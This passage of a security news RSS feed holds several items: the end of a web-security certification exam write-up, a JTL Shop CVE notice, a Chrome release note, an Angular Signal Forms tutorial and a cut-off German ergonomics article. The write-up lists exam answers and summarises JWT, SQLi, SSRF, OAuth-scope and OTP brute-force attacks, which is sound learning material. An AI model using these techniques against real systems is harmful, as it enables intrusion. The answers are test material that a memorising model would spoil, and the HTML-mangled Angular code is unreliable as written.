SSTI</li><li><strong>Unauthenticated user role</strong> → anonymous</li><li><strong>Events endpoint</strong> → /dashboard</li><li><strong>Event name (authenticated)</strong> → Masquerade Ball</li><li><strong>Admin username</strong> → notatypicalsysadmin</li><li><strong>File path containing “flag”</strong> → /etc/passwd</li><li><strong>Flag value in file system</strong> → flag (user in /etc/passwd)</li><li><strong>Internal URL for secrets</strong> → <a href="http://127.0.0.1:8000/health">http://127.0.0.1:8000/health</a></li><li><strong>Encoded SSRF response</strong> → hex-encoded Base64 string</li><li><strong>Decoded “hidden in layers”</strong> → plaintext credentials</li><li><strong>WebApp 02 login endpoint</strong> → /client/login</li><li><strong>Client ID</strong> → client_1337</li><li><strong>Bob’s credit card</strong> → found in admin panel</li></ol><h3>Tools Used</h3><ul><li><strong>feroxbuster</strong> — Directory and endpoint enumeration</li><li><strong>Burp Suite</strong> — Request interception, modification, Intruder</li><li><strong>jwt.io</strong> — JWT token decoding and manipulation</li><li><strong>curl</strong> — Manual request crafting</li><li><strong>xxd + base64</strong> — Multi-layer decoding</li></ul><h3>Key Lessons Learned</h3><p><strong>1. Always check JWT algorithm first.</strong><br> none algorithm is a well-known vulnerability but still appears in real applications. Check jwt.io immediately whenever you see a JWT cookie.</p><p><strong>2. CAPTCHA bypass ≠ brute force.</strong><br> The CAPTCHA here wasn’t bypassed — it was used strategically. Solving it correctly to enumerate valid usernames, then using SQLi for the actual bypass, is cleaner than fighting the CAPTCHA itself.</p><p><strong>3. Multi-layer encoding is intentional.</strong><br> The hex → Base64 → plaintext chain in the SSRF response is designed to make you think before you decode. Know your encoding formats: hex, Base64, URL encoding.</p><p><strong>4. OAuth scope parameters are user-controlled.</strong><br> Never trust client-side scope values. Changing read to admin in a request shouldn't work - but it does in misconfigured systems. Always test scope escalation in OAuth flows.</p><p><strong>5. OTP brute force only works if the OTP doesn’t change.</strong><br> The application’s fatal flaw was issuing the same OTP code repeatedly. In a secure implementation, OTPs expire and change with each request. This is a real-world vulnerability class, not just a CTF trick.</p><h3>Final Thoughts</h3><p>Web-RTA is a solid entry-level web security certification. The attack chain is realistic — JWT manipulation, SQLi, XXE, SSRF, and OAuth abuse are all vulnerabilities you’ll encounter in real bug bounty targets and penetration tests.</p><p>It’s not the hardest exam. But it tests whether you can chain vulnerabilities together under a black-box scenario — and that skill is what separates someone who’s memorized OWASP Top 10 from someone who can actually exploit it.</p><p>If you’re preparing: be comfortable with Burp Suite, understand JWT structure deeply, and practice SSRF + XXE payloads from PortSwigger Web Security Academy. Everything else in this exam flows naturally from those skills.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zVMUVg071wNCj_x12UoN3A.jpeg"></figure><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=20c6bd74e675" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/web-rta-exam-writeup-passed-cyberwarfare-labs-20c6bd74e675">Web-RTA Exam Writeup — Passed | CyberWarFare Labs</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54390 | JTL Shop up to 5.1.7/5.5.3/5.6.1/5.7.1 Encryption Key special elements used in a template engine (EUVD-2026-37925)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in JTL Shop up to 5.1.7/5.5.3/5.6.1/5.7.1. This vulnerability affects unknown code of the component Encryption Key Handler. Such manipulation leads to improper neutralization of special elements used in a template engine.

This vulnerabi...]]></description>
<link>https://tsecurity.de/de/3608864/sicherheitsluecken/cve-2026-54390-jtl-shop-up-to-517553561571-encryption-key-special-elements-used-in-a-template-engine-euvd-2026-37925/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608864/sicherheitsluecken/cve-2026-54390-jtl-shop-up-to-517553561571-encryption-key-special-elements-used-in-a-template-engine-euvd-2026-37925/</guid>
<pubDate>Thu, 18 Jun 2026 22:08:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/jtl:shop">JTL Shop up to 5.1.7/5.5.3/5.6.1/5.7.1</a>. This vulnerability affects unknown code of the component <em>Encryption Key Handler</em>. Such manipulation leads to improper neutralization of special elements used in a template engine.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-54390">CVE-2026-54390</a>. The attack may be launched remotely. There is no exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 151 (151.0.7896.3) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3608622/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608622/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Thu, 18 Jun 2026 20:07:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 151 (151.0.7896.3) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7885.0..151.0.7896.3?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Angular Signals in practice: Building a signal-first form in Angular]]></title>
<description><![CDATA[Understanding a reactivity model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained i...]]></description>
<link>https://tsecurity.de/de/3608234/ai-nachrichten/angular-signals-in-practice-building-a-signal-first-form-in-angular/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608234/ai-nachrichten/angular-signals-in-practice-building-a-signal-first-form-in-angular/</guid>
<pubDate>Thu, 18 Jun 2026 17:21:00 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Understanding a <a href="https://www.infoworld.com/article/2335507/reactive-javascript-the-evolution-of-front-end-architecture.html">reactivity</a> model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained in practice.</p>



<p>In two previous articles, “<a href="https://www.infoworld.com/article/4171858/angular-signal-forms-from-event-pipelines-to-signal-driven-state.html">Angular Signal Forms: From event pipelines to signal-driven state</a>” and “<a href="https://www.infoworld.com/article/4180890/angular-signals-explained-how-pull-based-reactivity-changes-how-we-model-state.html">Angular Signals explained: How pull-based reactivity changes how we model state</a>,” we reframed form behavior as a state-driven problem and examined Angular Signals as a pull-based reactivity model well-suited to that kind of work. The natural next step is to apply those ideas to an actual Angular form and observe how the architecture changes when state becomes the primary concern.</p>



<p>This article focuses on a concrete example: a modest but realistic registration form. Rather than introducing new concepts, the goal here is to make earlier ideas tangible. We will see how a signal-backed model reshapes validation, interaction state, and submission logic, and how much coordination logic simply disappears when form behavior is expressed declaratively.</p>



<p>The focus here is not on novelty or completeness, but on making the underlying ideas easier to reason about. By walking through a signal-first form from model definition to submission, we can evaluate whether this approach truly reduces complexity and where it introduces new trade-offs that teams should understand before adopting it more broadly.</p>



<h4 class="wp-block-heading">Read the series:</h4>



<ul class="wp-block-list">
<li><a href="https://www.infoworld.com/article/4171858/angular-signal-forms-from-event-pipelines-to-signal-driven-state.html">Angular Signal Forms: From event pipelines to signal-driven state</a></li>



<li><a href="https://www.infoworld.com/article/4180890/angular-signals-explained-how-pull-based-reactivity-changes-how-we-model-state.html">Angular Signals explained: How pull-based reactivity changes how we model state</a></li>



<li><a href="https://www.infoworld.com/article/4185924/angular-signals-in-practice-building-a-signal-first-form-in-angular.html" data-type="link" data-id="https://www.infoworld.com/article/4185924/angular-signals-in-practice-building-a-signal-first-form-in-angular.html">Angular Signals in practice: Building a signal-first form in Angular</a></li>
</ul>



<h2 class="wp-block-heading"><a></a>Implementing a signal-first registration form</h2>



<p>With the conceptual groundwork in place, we can now turn theory into a concrete implementation. In this section, we will build a fully working registration form using Angular’s Signal Forms API. This example is deliberately modest in scope, but it is designed to serve as the foundation for the rest of the series. Each subsequent article will extend this same example rather than introducing a new one.</p>



<p>The form collects an email address, a password, a confirmation password, and explicit acceptance of terms. While simple on the surface, this structure allows us to explore field-level validation, cross-field constraints, interaction state, and submission behavior, all without reverting to event-driven form logic.</p>



<h3 class="wp-block-heading"><a></a>Project setup and structure</h3>



<p>The example assumes a standard Angular application created with the Angular CLI and configured to use Signals (Angular 17+). The Signal Forms APIs (Angular 21+) live under @angular/forms/signals, which must be explicitly imported.</p>



<p><a href="https://github.com/sonukapoor/angular-signal-forms">https://github.com/sonukapoor/angular-signal-forms</a></p>



<p>The folder structure is intentionally conservative:</p>



<p>src/<br>  app/<br>    registration/<br>      registration.component.ts<br>      registration.component.html<br>      registration.model.ts</p>



<p>Separating the model from the component keeps form state independent of presentation. This becomes increasingly valuable as the form grows or is reused across multiple components.</p>



<h3 class="wp-block-heading"><a></a>Defining the form model</h3>



<p>We begin by defining the shape of the data that the form collects. This is a plain TypeScript interface with no Angular dependencies. Treating the form model as a simple data structure reinforces the idea that the form’s values are just state.</p>



<pre class="wp-block-code"><code>// registration.model.ts
export interface RegistrationData {
  email: string;
  password: string;
  confirmPassword: string;
  acceptedTerms: boolean;
}
</code></pre>



<p>This interface mirrors what would typically be sent to a back-end API. There is no duplication of state, no separate “form value” object, and no mapping required at submission time.</p>



<h3 class="wp-block-heading"><a></a>Creating the signal-backed form</h3>



<p>The form itself is created in the component using a writable signal as the source of truth. The <code>form()</code> function attaches form semantics validation, field state, and submission to that signal.</p>



<pre class="wp-block-code"><code>// registration.component.ts
import { CommonModule } from "@angular/common";
import { Component, signal } from "@angular/core";
import {
  email,
  form,
  FormField,
  required,
  submit,
} from "@angular/forms/signals";
import { RegistrationData } from "./registration.model";

@Component({
  selector: "app-registration",
  imports: [FormField, CommonModule],
  templateUrl: "./registration.html",
  styleUrl: "./registration.css",
})
export class Registration {
  readonly model = signal<registrationdata>({
    email: "",
    password: "",
    confirmPassword: "",
    acceptedTerms: false,
  });

  readonly registrationForm = form(this.model, (schema) =&gt; {
    required(schema.email, { message: "Email is required" });
    email(schema.email, { message: "Enter a valid email address" });

    required(schema.password, { message: "Password is required" });
    required(schema.confirmPassword, {
      message: "Please confirm your password",
    });

    required(schema.acceptedTerms, {
      message: "You must accept the terms to continue",
    });
  });

  async onSubmit(event?: Event) {
    event?.preventDefault();

    await submit(this.registrationForm, (value) =&gt; {
      console.log(value());
      // Mock Server Call
      return Promise.resolve([
        {
          kind: "EmailAlreadyExists",
          field: this.registrationForm.email,
          error: { kind: "server", message: "Email already taken" },
        },
      ]);
    });
  }
}
</registrationdata></code></pre>



<p>Several design decisions are worth noting.</p>



<p>First, the model signal is defined as read-only. All mutations to the model occur through form bindings, not ad hoc assignments in the component. This keeps the component declarative and avoids the temptation to manipulate form state imperatively.</p>



<p>Second, validation is declared in one place. The schema function describes constraints on the model without introducing control trees, validator arrays, or observable pipelines. Angular takes responsibility for re-running validation whenever the model changes.</p>



<p>Finally, submission logic is explicit. The <code>submit()</code> helper ensures that the form is valid before invoking the callback, and it passes the current model value directly. There is no need to check flags or manually extract values.</p>



<h3 class="wp-block-heading"><a></a>Binding the form to the template</h3>



<p>With the form defined, the next step is to bind it to the template. Signal Forms provide the <code>[formField]</code> directive, which connects an input element directly to a field in the form schema.</p>



<pre class="wp-block-code"><code><!-- registration.component.html -->

  <div>
    <label>Email</label>
    

    @if (
      registrationForm.email().invalid() &amp;&amp; registrationForm.email().touched()
    ) {
      <p class="error">
        {{ registrationForm.email().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Password</label>
    

    @if (
      registrationForm.password().invalid() &amp;&amp;
      registrationForm.password().touched()
    ) {
      <p class="error">
        {{ registrationForm.password().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Confirm Password</label>
    

    @if (
      registrationForm.confirmPassword().invalid() &amp;&amp;
      registrationForm.confirmPassword().touched()
    ) {
      <p class="error">
        {{ registrationForm.confirmPassword().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>
      
      I accept the terms and conditions
    </label>

    @if (
      registrationForm.acceptedTerms().invalid() &amp;&amp;
      registrationForm.acceptedTerms().touched()
    ) {
      <p class="error">
        {{ registrationForm.acceptedTerms().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    @if (registrationForm().errors().length &gt; 0) {
      <div class="error">
        @for (error of registrationForm().errors(); track error.message) {
          <p>{{ error.kind }}</p>
        }
      </div>
    }
  </div>

  <button type="submit">
    Register
  </button>

</code></pre>



<p>What stands out here is the absence of indirection. Each input binds directly to a field. Validation state is accessed through signals such as <code>invalid()</code> and <code>touched()</code>. Error messages are read from a structured error object, not reconstructed manually.</p>



<p>This template contains no subscriptions, no async pipes, and no event handlers for value changes. The UI simply reflects the current form state.</p>



<h3 class="wp-block-heading"><a></a>Interaction state and user experience</h3>



<p>One of the common criticisms of declarative form models is that they obscure user interaction logic. Signal Forms address this directly by exposing interaction metadata as signals.</p>



<p>The <code>touched()</code> signal determines whether a field has been interacted with. By combining it with <code>invalid()</code>, we control when validation messages appear. This logic remains purely declarative: the template describes when errors should be visible, and Angular ensures the signals stay up-to-date.</p>



<p>The disabled state of the submit button is derived from <code>registrationForm.invalid()</code>. There is no need to manually enable or disable it in response to events. If the form becomes valid, the button is enabled automatically.</p>



<h3 class="wp-block-heading"><a></a>Why this scales</h3>



<p>Even at this early stage, several advantages of a signal-first form model are apparent. The form’s behavior is expressed in terms of state and derivation, not events. The model, validation rules, and UI bindings are clearly separated. There is no duplication of logic between the component and the template.</p>



<p>As the form grows, this structure holds. Additional fields introduce additional schema entries and template bindings, not new subscription logic. Cross-field validation can be added declaratively. Asynchronous validation and persistence can be layered on without rewriting the core model.</p>



<p>Most importantly, the form remains inspectable. At any point during execution, the model signal reflects the current state of the form. Derived state validity, errors, and UI flags can be understood by reading the code, not by tracing runtime behavior.</p>



<h2 class="wp-block-heading"><a></a>What we did not solve yet (and why)</h2>



<p>At this stage, it would be easy to walk away with the impression that Signal Forms eliminates most of the hard problems associated with form handling. That impression would be misleading. What we have built so far is intentionally incomplete, not because the approach falls short, but because introducing too much too early obscures the value of the underlying model.</p>



<p>One area we have deliberately postponed is cross-field validation that expresses richer business rules. Many real-world forms depend on relationships between fields rather than isolated constraints. Password confirmation is a familiar example, but more complex scenarios quickly arise in enterprise applications. While Signal Forms support these patterns, introducing them before establishing a clear understanding of derived state risks turns validation back into an imperative exercise rather than a declarative one.</p>



<p>We have also avoided asynchronous validation. Server-backed checks introduce latency, partial failure, cancellation, and race conditions. These are not trivial concerns, and treating them casually often leads to subtle bugs and confusing user experiences. Although Signal Forms provide the necessary hooks to model asynchronous behavior, doing so responsibly requires a careful discussion of pending state, effects, and life-cycle boundaries. That discussion belongs in its own article.</p>



<p>Another omission is persistence and synchronization. Many forms need to autosave drafts, synchronize state with local storage, or react to changes by triggering external side effects. These behaviors are not part of the form state itself; they are consequences of state changes. Treating them as such is essential to keeping the architecture comprehensible. Introducing persistence too early would blur the distinction between state and reaction that this article has worked to establish.</p>



<p>Finally, this article has not addressed migration and interoperability. Few teams are starting from a blank slate. Most will adopt Signal Forms incrementally within applications that already rely on reactive forms or template-driven forms. Hybrid approaches, bridging strategies, and gradual refactors are all critical topics, but they presuppose familiarity with both paradigms. Addressing migration before establishing a solid signal-first mental model would undermine that foundation.</p>



<p>These omissions are intentional. A form architecture that tries to do everything at once often ends up doing nothing clearly. By focusing on the core ideas of state, derivation, and declarative validation, we create a base that can absorb additional complexity without collapsing under it.</p>



<h2 class="wp-block-heading"><a></a>Signal Forms in the context of Angular’s evolution</h2>



<p>To fully appreciate Signal Forms, it helps to step back and view them not as an isolated feature, but as part of a broader shift in Angular’s design philosophy.</p>



<p>For much of its history, Angular emphasized declarative templates paired with imperative coordination in component classes. RxJS became the backbone of that coordination, providing a powerful abstraction for handling asynchronous workflows, user input, and external events. This model scaled well, but it also encouraged developers to express state indirectly through streams and subscriptions.</p>



<p>Signals represent a deliberate recalibration. They re-center Angular’s reactivity model around state and derivation, rather than events and emissions. This shift is visible across the framework: in component inputs, change detection, and now forms. Signal Forms are not an attempt to replace everything that came before; they are an attempt to make the most common use case, modeling and deriving state, simpler and more explicit.</p>



<p>Framed this way, the design of Signal Forms aligns more closely with state-driven form behavior. The requirement to start with a model signal reflects the idea that the state should have a single, inspectable source of truth. Schema-based validation aligns with the notion that constraints are properties of state, not behaviors triggered by events. Field state exposed as signals reinforces the idea that validity, errors, and interaction metadata are derived values that should be read, not managed.</p>



<p>It is also worth noting that Signal Forms do <em>not</em> attempt to abstract away form behavior. They do not hide form state behind opaque classes or life-cycle hooks. They do not require developers to think in terms of control hierarchies or subscription graphs. Instead, they expose form behavior directly, making it easier to reason about how values, validation, and UI feedback relate to one another.</p>



<p>This approach aligns closely with other recent changes in Angular, including the introduction of modern template control flow and a stronger emphasis on explicit data dependencies. Together, these features point toward a framework that favors clarity over indirection and composition over orchestration.</p>



<p>Importantly, Signal Forms are still evolving. Their APIs may change, and their surface area will almost certainly expand. That is precisely why grounding them in first principles matters. Developers who understand <em>why</em> Signal Forms work the way they do will be far better equipped to adapt as the APIs mature.</p>



<p>This article has intentionally avoided duplicating documentation or enumerating every available feature. Instead, it has focused on establishing a conceptual framework that makes the official APIs feel intuitive rather than surprising. When viewed this way, Signal Forms are not a new way to write forms; they are a clearer expression of what forms have always been.</p>



<h2 class="wp-block-heading"><a></a>A new way to think about forms</h2>



<p>Building the registration form in this article reveals a quiet but important shift. The reduction in complexity does not come from fewer features or simpler requirements. It comes from expressing form behavior in terms of state and derivation rather than orchestration and reaction.</p>



<p>By treating the data model as the single source of truth, validation rules as declarative constraints, and UI behavior as derived from current conditions, much of the coordination logic that typically surrounds forms becomes unnecessary. There are fewer subscriptions to manage, fewer flags to synchronize, and fewer life-cycle concerns to reason about. Form behavior becomes easier to inspect because it is visible directly in the relationships between values.</p>



<p>This approach does not eliminate the hard problems associated with forms. Asynchronous validation, persistence, and interoperability with existing Angular Forms APIs still require careful design. What changes is where that complexity lives. Instead of being interwoven with state representation, those concerns are layered explicitly on top of a clear foundation.</p>



<p>Signal-first forms are not a universal replacement for existing patterns, nor are they a shortcut to simpler applications. They are, however, a strong example of how aligning APIs with first principles can reduce cognitive overhead and improve maintainability over time. For teams building large, state-heavy forms, this alignment can make the difference between code that merely works and code that continues to evolve without friction.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ihr Rücken wird es Ihnen danken: Der 10-Minuten-Schreibtisch-Check]]></title>
<description><![CDATA[Wenn Sie täglich viele Stunden am Schreibtisch arbeiten, ist es sehr wahrscheinlich, dass Sie schon einmal unter Rücken- oder Nackenschmerzen gelitten haben. Dies ist eine der häufigsten Begleiterscheinungen der Büroarbeit, insbesondere wenn Sie lange Zeit vor dem Laptop verbringen.



Es gibt je...]]></description>
<link>https://tsecurity.de/de/3607564/it-nachrichten/ihr-ruecken-wird-es-ihnen-danken-der-10-minuten-schreibtisch-check/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607564/it-nachrichten/ihr-ruecken-wird-es-ihnen-danken-der-10-minuten-schreibtisch-check/</guid>
<pubDate>Thu, 18 Jun 2026 13:32:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Wenn Sie täglich viele Stunden am Schreibtisch arbeiten, ist es sehr wahrscheinlich, dass Sie schon einmal unter Rücken- oder Nackenschmerzen gelitten haben. Dies ist eine der häufigsten Begleiterscheinungen der Büroarbeit, insbesondere wenn Sie lange Zeit vor dem Laptop verbringen.</p>



<p>Es gibt jedoch Möglichkeiten, um diese Probleme zu lindern und langfristig für eine bessere Rückengesundheit zu sorgen. Viele Anpassungen in Ihrem Heimbüro lassen sich sogar in wenigen Minuten umsetzen.</p>



<p>Nachdem ich fast mein gesamtes Erwachsenenleben mit Rückenschmerzen und Fehlhaltungen zu kämpfen hatte, habe ich meine Beschwerden in den vergangenen Jahren größtenteils in den Griff bekommen.</p>



<p>Hier finden Sie alles, was ich über die Linderung von Rückenschmerzen und die Verbesserung der Haltung am Schreibtisch gelernt habe. Die vielen kleinen Anpassungen werden auch nicht mehr als 10 Minuten Ihrer Zeit beanspruchen.</p>



<div class="wp-block-idg-base-theme-listicle-chart-block wp-block-product-chart product-chart">
<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Kontrollieren Sie sich selbst</h2>



<p>Der erste Schritt besteht darin, sich selbst, Ihre Körperhaltung und Ihre Routinen vor dem Rechner zu überprüfen. Sitzen Sie den ganzen Tag ohne Pausen an Ihrem Schreibtisch? Sitzen Sie dabei auch noch gekrümmt? Ist es der untere Rücken, der Ihnen Probleme bereitet, oder eher der obere Rücken?</p>



<p>Passen Sie alle Änderungen an Ihre individuellen Schmerzpunkte an. Wenn Sie etwas bemerken, das zu Ihren Rückenschmerzen und Haltungsproblemen beiträgt, sollten Sie diese Gewohnheiten unbedingt zuerst angehen.</p>



<p>Solche schnellen Änderungen sind großartig. Sie müssen sie aber auch beibehalten. Die langfristige Gesundheit Ihres Rückens hängt von Ihnen ab. Es ist essenziell, dass Sie an diesen besseren Gewohnheiten festhalten, sobald sie einmal etabliert sind.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-1 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF1"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-1 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Die Höhe des Bildschirms</h2>



<p>Auf den schicken Fotos eines aufgeräumten Schreibtischs im Internet ist der Monitor häufig sehr hoch oder sehr niedrig angebracht. Dies hat viele Menschen dazu verleitet, zum Bildschirm hinauf- oder hinunterzuschauen.</p>



<p>Die Höhe Ihres Monitors sollte jedoch so eingestellt sein, dass Ihre Augen ganz natürlich im oberen Drittel des Bildschirms ruhen, wenn Sie geradeaus schauen. Das bedeutet, dass die Mitte etwa 10 bis 20 Grad unterhalb Ihrer Augenhöhe liegen sollte. Dies ist das absolute Minimum an <a href="https://www.pcwelt.de/article/1172713/tutorial-den-bildschirm-richtig-einstellen.html" target="_blank" rel="noreferrer noopener">Monitoreinstellungen</a>, die Sie unbedingt vornehmen sollten.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1acf44"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Rear-view-of-monitor-with-stand-height-adjustment.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Rear view of monitor with stand height adjustment" class="wp-image-3123150" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Martindale / Foundry</p></div>



<p>Die meisten Monitore lassen sich dazu in der Höhe verstellen. Wenn dies bei Ihrem Modell nicht möglich ist, haben Sie trotzdem noch Spielraum. Am einfachsten ist es, den Bildschirm auf eine Kiste zu stellen oder die Höhe Ihres Stuhls anzupassen, um Ihre Blickrichtung zu verändern. Wenn Sie einen Steh-Sitz-Schreibtisch verwenden, ist die Höhenverstellung des Schreibtischs selbst eine weitere einfache Möglichkeit, um Ihren Monitor bzw. Ihre Monitore besser an Ihre Augenhöhe auszurichten.</p>



<p>Sollte es sich jedoch als unmöglich erweisen, in der richtigen Höhe zu sitzen, dann versuchen Sie wenigstens, Ihren Bildschirm leicht nach oben zu neigen. Befinden Sie sich unterhalb der idealen Linie, können Sie hingegen versuchen, den Monitor leicht nach unten zu neigen. Diese Art der Neigung ist zwar nicht ideal, aber immer noch besser als gar nichts.</p>



<p>Die ideale Lösung, die die größte Verstellbarkeit und Vielseitigkeit bietet, ist die Befestigung Ihres Monitors an einem Monitorarm. Mit Monitorarmen lassen sich Bildschirme ganz einfach genau nach Ihren Bedürfnissen neigen, verschieben, drehen, schwenken und anheben. Wir haben die besten Modelle getestet. Diese finden Sie in unserem Artikel <a href="https://www.pcwelt.de/article/2214241/die-besten-monitorarme.html" target="_blank" rel="noreferrer noopener">Die besten Monitorarme im Test: Das Nonplusultra an Flexibilität</a>.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a33d6e1ad5fd"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/laptopstand02.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Laptop stand" class="wp-image-2956584" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Martindale</p></div>



<p>Wenn Sie hingegen an einem Laptop arbeiten und die Monitorhöhe nicht separat einstellen können, versuchen Sie es stattdessen mit einer <a href="https://www.pcwelt.de/article/1203176/die-besten-office-maeuse-fuer-pc-mac-im-test-2022.html" target="_blank" rel="noreferrer noopener">externen Maus</a> und <a href="https://www.pcwelt.de/article/1202798/test-kabellose-tastaturen.html" target="_blank" rel="noreferrer noopener">Tastatur</a>. Dadurch haben Sie die Möglichkeit, Ihren Laptop auf einen Ständer oder eine Kiste zu stellen. Dies sorgt gleichzeitig dafür, dass Sie den Computer ergonomischer mit Maus und Tastatur steuern können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-2 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF2"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-2 POST @@-->


<div class="wp-block-listicle-chart"><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading toc  ">Die Höhe von Tastatur und Maus</h2>



<p>Wenn Sie Ihren Laptop oder Computer zusammen mit einer Maus und einer Tastatur verwenden, ist auch die richtige Ausrichtung der Peripheriegeräte essenziell.</p>



